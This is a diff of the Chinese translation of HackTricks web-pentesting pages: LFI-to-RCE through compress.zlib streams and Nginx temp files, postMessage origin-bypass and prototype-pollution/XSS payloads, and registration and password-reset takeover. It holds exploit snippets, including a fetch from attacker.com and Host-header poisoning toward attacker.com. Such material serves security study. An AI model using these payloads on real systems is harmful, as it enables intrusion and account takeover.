<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**害**。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -143,7 +143,7 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们**。

30
pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
View file

@ -4,7 +4,7 @@
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
@ -12,15 +12,15 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以在以下网址查看他们的网站并尝试他们的引擎,**免费**使用
您可以访问他们的网站并免费尝试他们的引擎
{% embed url="https://whiteintel.io" %}
@ -28,13 +28,13 @@ WhiteIntel的主要目标是打击由窃取信息的恶意软件导致的账户
## `compress.zlib://``PHP_STREAM_PREFER_STDIO`
使用`compress.zlib://`协议和标志`PHP_STREAM_PREFER_STDIO`打开的文件可以继续将到达连接的数据写入同一文件。
使用协议`compress.zlib://`和标志`PHP_STREAM_PREFER_STDIO`打开的文件可以继续将后续到达的数据写入同一文件
这意味着可以进行如下调用:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
将发送一个请求请求http://attacker.com/file然后服务器可能会用一个有效的HTTP响应来回应该请求保持连接打开并在稍后发送额外的数据,这些数据也会被写入文件。
将发送一个请求请求http://attacker.com/file然后服务器可能会用一个有效的HTTP响应来回应该请求保持连接打开并在一段时间后发送额外的数据,这些数据也将被写入文件。
您可以在php-src代码的main/streams/cast.c部分看到这些信息
```c
@ -54,21 +54,21 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
**在**这个**连接**存在的同时,攻击者将**窃取临时文件的路径**(被服务器泄露)。
**在**连接**仍然打开**的情况下,攻击者将**利用LFI加载他控制的临时文件**。
**在**连接**仍然打开的情况下,攻击者将**利用LFI加载他控制的临时文件**。
然而Web服务器中有一个检查**阻止加载包含`<?`的文件**。因此,攻击者将滥用**竞争条件**。在仍然打开的连接中,**攻击者**将在**Web服务器**检查文件是否包含禁止字符之后**发送PHP有效载荷**,但在**加载其内容之前**。
然而Web服务器中有一个检查**阻止加载包含`<?`的文件**。因此,攻击者将滥用**竞争条件**。在仍然打开的连接中,**攻击者**将在**Web服务器**检查文件是否包含禁止字符之后**发送PHP有效载荷但在加载其内容之前**。
有关更多信息请查看竞争条件和CTF的描述[https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个以**暗网**为基础的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供免费功能,以检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以在以下网址检查他们的网站并尝试他们的引擎,**免费**
您可以访问他们的网站并免费尝试他们的引擎
{% embed url="https://whiteintel.io" %}

58
pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
View file

@ -2,23 +2,23 @@
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -28,11 +28,11 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
---
## 可破坏的配置
## 弱点配置
**[示例来自 https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
**[示例来自https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
* PHP代码:
- PHP代码:
````h`
<?php include_once($_GET['file']);
```
@ -43,16 +43,16 @@ php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
```
* 设置 / 化:
* 设置 / 化:
```bash
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
幸运的是PHP 目前经常通过 PHP-FPM 和 Nginx 部署。Nginx 提供了一个很容易被忽视的 [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) 功能,如果客户端请求体(不仅限于 post)超过一定阈值,将会写入临时文件。
幸运的是PHP 目前经常通过 PHP-FPM 和 Nginx 部署。Nginx 提供了一个很容易被忽视的 [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) 功能,如果客户端请求体(不仅限于 POST)超过一定阈值,将会写入临时文件。
如果 Nginx 以与 PHP 相同的用户(通常是 www-data身份运行此功能允许利用 LFI 而无需任何其他创建文件的方式
这个功能允许利用 LFI 进行利用,而无需任何其他创建文件的方式,如果 Nginx 以与 PHP 相同的用户身份运行(通常会以 www-data 用户身份运行)
相关的 Nginx 代码:
```c
@ -71,7 +71,7 @@ if (fd != -1 && !persistent) {
return fd;
}
```
这里可以看到在被Nginx打开后**临时文件会立即取消链接**。幸运的是,**procfs可以用来仍然获取**已删除文件的引用,通过竞争:
这里可以看到在被Nginx打开后**临时文件会立即取消链接**。幸运的是,**procfs可以用来仍然获取**已删除文件的引用,通过竞争:
```
...
/proc/34/fd:
@ -157,7 +157,11 @@ for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
```
输出:
## 利用 Nginx 临时文件进行 LFI 到 RCE
在某些情况下Nginx 可能会将请求写入临时文件中这为攻击者提供了一个利用路径遍历漏洞实现远程代码执行RCE的机会。
攻击者可以通过构造恶意请求,使 Nginx 将请求写入临时文件然后利用本地文件包含漏洞LFI来执行恶意代码。这种技术需要攻击者能够控制请求的内容以便在临时文件中写入恶意代码。
```
$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
@ -292,13 +296,13 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -306,14 +310,14 @@ WhiteIntel 的主要目标是打击由窃取信息的恶意软件导致的账户
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持 HackTricks 的其他方式:
支持HackTricks的其他方式
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord **](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

68
pentesting-web/postmessage-vulnerabilities/README.md
View file

@ -10,15 +10,15 @@
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -64,7 +64,7 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
### 攻击 iframe 和 **targetOrigin** 中的通配符
如[**此报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)所述,如果您找到一个可以被**iframed**(没有 `X-Frame-Header` 保护)且通过**postMessage**发送**敏感**消息的页面,且使用**通配符**\*),您可以**修改** **iframe** 的**来源**并将**敏感**消息**泄露**到您控制的域。\
如[**此报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)所述,如果您找到一个页面可以被**iframed**(没有 `X-Frame-Header` 保护)且通过**postMessage**使用**通配符**\*发送敏感消息,您可以**修改** **iframe** 的**来源**并将**敏感**消息泄露到您控制的域。\
请注意,如果页面可以被 iframed 但**targetOrigin**设置为 URL 而不是通配符,则此**技巧将无效**。
```markup
<html>
@ -96,28 +96,34 @@ return;
为了在当前页面中找到事件监听器,您可以:
- 在JS代码中搜索 `window.addEventListener``$(window).on`JQuery版本
- 在JS代码中搜索 `window.addEventListener``$(window).on`_JQuery版本_
- 在开发者工具控制台中执行:`getEventListeners(window)`
![](<../../.gitbook/assets/image (618) (1).png>)
- 转到浏览器的开发者工具中的 _Elements --> Event Listeners_
![](<../../.gitbook/assets/image (393).png>)
- 使用浏览器扩展,如 [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) 或 [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)。这些浏览器扩展将拦截所有消息并显示给您。
### 源检查绕过
- `event.isTrusted` 属性被认为是安全的,因为它仅对由真实用户操作生成的事件返回 `True`。尽管如果实施正确,很难绕过,但它在安全检查中的重要性值得注意。
- 在 PostMessage 事件中使用 `indexOf()` 进行源验证可能容易被绕过。以下是说明此漏洞的示例:
- **`event.isTrusted`** 属性被认为是安全的,因为它仅对由真实用户操作生成的事件返回 `True`。尽管如果实施正确,绕过它是具有挑战性的,但它在安全检查中的重要性值得注意。
- 在 PostMessage 事件中使用 **`indexOf()`** 进行源验证可能容易被绕过。以下是说明此漏洞的示例:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
- `String.prototype.search()` 中的 `search()` 方法用于正则表达式,而不是字符串。传递除正则表达式以外的任何内容会导致隐式转换为正则表达式,使该方法可能不安全。这是因为在正则表达式中,点(.)充当通配符,允许使用特别设计的域绕过验证。例如:
- `String.prototype.search()` 中的 **`search()`** 方法用于正则表达式,而不是字符串。传递除正则表达式以外的任何内容会导致隐式转换为正则表达式,使该方法可能不安全。这是因为在正则表达式中,点(.)充当通配符,允许使用特别设计的域绕过验证。例如:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
- `match()` 函数类似于 `search()`,处理正则表达式。如果正则表达式结构不正确,可能容易被绕过。
- `escapeHtml` 函数旨在通过转义字符来对输入进行清理。但它不会创建新的转义对象,而是覆盖现有对象的属性。这种行为可能会被利用。特别是,如果可以操纵对象以使其受控属性不承认 `hasOwnProperty`,则 `escapeHtml` 不会按预期执行。以下示例演示了这一点:
- **`match()`** 函数类似于 `search()`,处理正则表达式。如果正则表达式结构不正确,可能容易被绕过。
- **`escapeHtml`** 函数旨在通过转义字符来对输入进行清理。但它不会创建新的转义对象,而是覆盖现有对象的属性。这种行为可能会被利用。特别是,如果可以操纵对象以使其受控属性不承认 `hasOwnProperty`,则 `escapeHtml` 不会按预期执行。以下示例演示了这一点:
* 预期失败:
* 预期失败:
```javascript
result = u({
@ -125,21 +131,21 @@ message: "'\"<b>\\"
});
result.message // "&#39;&quot;&lt;b&gt;\"
```
* 绕过转义:
* 绕过转义:
```javascript
result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
```
在此漏洞的背景下,`File` 对象由于其只读的 `name` 属性而容易被利用。当在模板中使用此属性时,`escapeHtml` 函数不会对其进行清理,从而导致潜在的安全风险。
在此漏洞的背景下,`File` 对象由于其只读的 `name` 属性而容易被利用。当在模板中使用此属性时,它不会被 `escapeHtml` 函数清理,从而导致潜在的安全风险。
- JavaScript 中的 `document.domain` 属性可以由脚本设置为缩短域名,从而在同一父域内更宽松地执行同源策略。
### e.origin == window.origin 绕过
在使用 %%%%%% 在 **受限制的 iframe** 中嵌入网页时,理解 iframe 的来源将被设置为 null 是至关重要的。这在处理 **受限制属性** 及其对安全性和功能的影响时尤为重要。
在使用 %%%%%% 在 **受控的 iframe** 中嵌入网页时,了解 iframe 的来源将被设置为 null 是至关重要的。这在处理 **受控属性** 及其对安全性和功能的影响时尤为重要。
通过在受限制属性中指定 **`allow-popups`**,从 iframe 中打开的任何弹出窗口都会继承其父级的受限制属性。这意味着,除非还包括 **`allow-popups-to-escape-sandbox`** 属性,否则弹出窗口的来源也会被设置为 `null`,与 iframe 的来源相同。
通过在受属性中指定 **`allow-popups`**,从 iframe 中打开的任何弹出窗口都会继承其父级的受限制。这意味着,除非还包括 **`allow-popups-to-escape-sandbox`** 属性,否则弹出窗口的来源也会被设置为 `null`,与 iframe 的来源相同。
因此,在这些条件下打开弹出窗口并从 iframe 发送消息到弹出窗口时,发送和接收端的来源都被设置为 `null`。这种情况导致 **`e.origin == window.origin`** 评估为 true`null == null`),因为 iframe 和弹出窗口共享相同的 `null` 来源值。
@ -158,7 +164,7 @@ if( received_message.source !== window ) {
return;
}
```
可以通过创建一个**iframe**发送**postMessage**并**立即删除**它,强制消息的**`e.source`**为null。
可以通过创建一个**iframe**发送**postMessage**并**立即删除**它,强制消息的**`e.source`**为null。
要了解更多信息,请阅读:
@ -168,8 +174,8 @@ return;
### X-Frame-Header绕过
为了执行这些攻击,理想情况下您可以将受害者网页放在一个`iframe`中。但是一些头部字段如`X-Frame-Header`可能会**阻止**这种**行为**。\
在这种情况下,您仍然可以使用一种不太隐蔽的攻击。您可以打开一个新标签页到受漏洞的Web应用程序并与其通信
为了执行这些攻击,理想情况下,你可以将受害者网页放在一个`iframe`中。但是一些像`X-Frame-Header`这样的标头可能会**阻止**这种**行为**。\
在这种情况下,你仍然可以使用一种不那么隐秘的攻击。你可以打开一个新标签页到受影响的Web应用程序并与其通信
```markup
<script>
var w=window.open("<url>")
@ -186,7 +192,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
### 通过修改iframe位置窃取消息
如果您可以嵌入一个没有X-Frame-Header的包含另一个iframe的网页您可以**更改**该子iframe的位置因此如果它正在接收使用**通配符**发送的**postmessage**攻击者可以将该iframe的**来源**更改为由他控制的页面并**窃取**消息:
如果您可以嵌入一个没有X-Frame-Header的包含另一个iframe的网页您可以**更改该子iframe的位置**,因此,如果它正在接收使用**通配符**发送的**postmessage**攻击者可以将该iframe的**来源**更改为由他控制的页面并**窃取**消息:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -194,11 +200,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
### postMessage到Prototype Pollution和/或XSS
在通过`postMessage`发送的数据由JS执行的情况下您可以**嵌入**页面并通过`postMessage`发送利用**原型污染/XSS**的攻击
在通过`postMessage`发送的数据由JS执行的情况下您可以**嵌入**该**页面**并利用**原型污染/XSS**通过`postMessage`发送利用程序
可以在[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)中找到一些**非常好解释的通过`postMessage`进行XSS**的例子
可以在[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)中找到一些**非常好解释的通过`postMessage`的XSS**示例
通过`postMessage`向`iframe`发送利用**原型污染然后XSS**的利用示例:
通过`postMessage`向`iframe`发送利用程序以滥用**原型污染然后XSS**的示例:
```html
<html>
<body>
@ -216,9 +222,9 @@ setTimeout(get_code, 2000);
```
## 更多信息
* 链接到关[**原型污染**](../deserialization/nodejs-proto-prototype-pollution/)的页面
* 链接到关[**XSS**](../xss-cross-site-scripting/)的页面
* 链接到关[**客户端原型污染到XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)的页面
* 链接到关[**原型污染**](../deserialization/nodejs-proto-prototype-pollution/)的页面
* 链接到关[**XSS**](../xss-cross-site-scripting/)的页面
* 链接到关[**客户端原型污染到XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)的页面
## 参考资料
@ -226,13 +232,13 @@ setTimeout(get_code, 2000);
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* 练习:[https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
[**WhiteIntel**](https://whiteintel.io) 是一个由暗网支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -240,11 +246,11 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在HackTricks中看到您的公司广告或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。

99
pentesting-web/registration-vulnerabilities.md
View file

@ -2,29 +2,27 @@
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
您可以在以下网址检查他们的网站并尝试他们的引擎:{% embed url="https://whiteintel.io" %}
---
@ -53,7 +51,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户接
### SQL注入
[**查看此页面**](sql-injection/#insert-statement)以了解如何尝试通过注册表单中的**SQL注入**进行账户接管或提取信息。
[**查看此页面**](sql-injection/#insert-statement)以了解如何尝试通过**SQL注入**在注册表单中进行账户接管或提取信息。
### Oauth接管
@ -69,14 +67,35 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户接
### 更改电子邮件
注册后尝试更改电子邮件并检查此更改是否被正确验证或是否可以更改为任意电子邮件。
注册后尝试更改电子邮件并检查此更改是否被正确验证或是否可以更改为任意电子邮件。
### 更多检查
* 检查是否可以使用**一次性电子邮件**
* **长** **密码**>200会导致**拒绝服务**
* **长** **密码**>200会导致**DoS**
* **检查账户创建的速率限制**
* 使用username@**burp\_collab**.net并分析**回调**
## **密码重置接管**
### 通过引用者泄漏密码重置令牌 <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. 请求将密码重置到您的电子邮件地址
2. 单击密码重置链接
3. 不更改密码
4. 单击任何第三方网站例如FacebookTwitter
5. 拦截Burp Suite代理中的请求
6. 检查引用者标头是否泄漏密码重置令牌。
### 密码重置操纵 <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. 在Burp Suite中拦截密码重置请求
2. 在Burp Suite中添加或编辑以下标头`Host: attacker.com``X-Forwarded-Host: attacker.com`
3. 使用修改后的标头转发请求\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
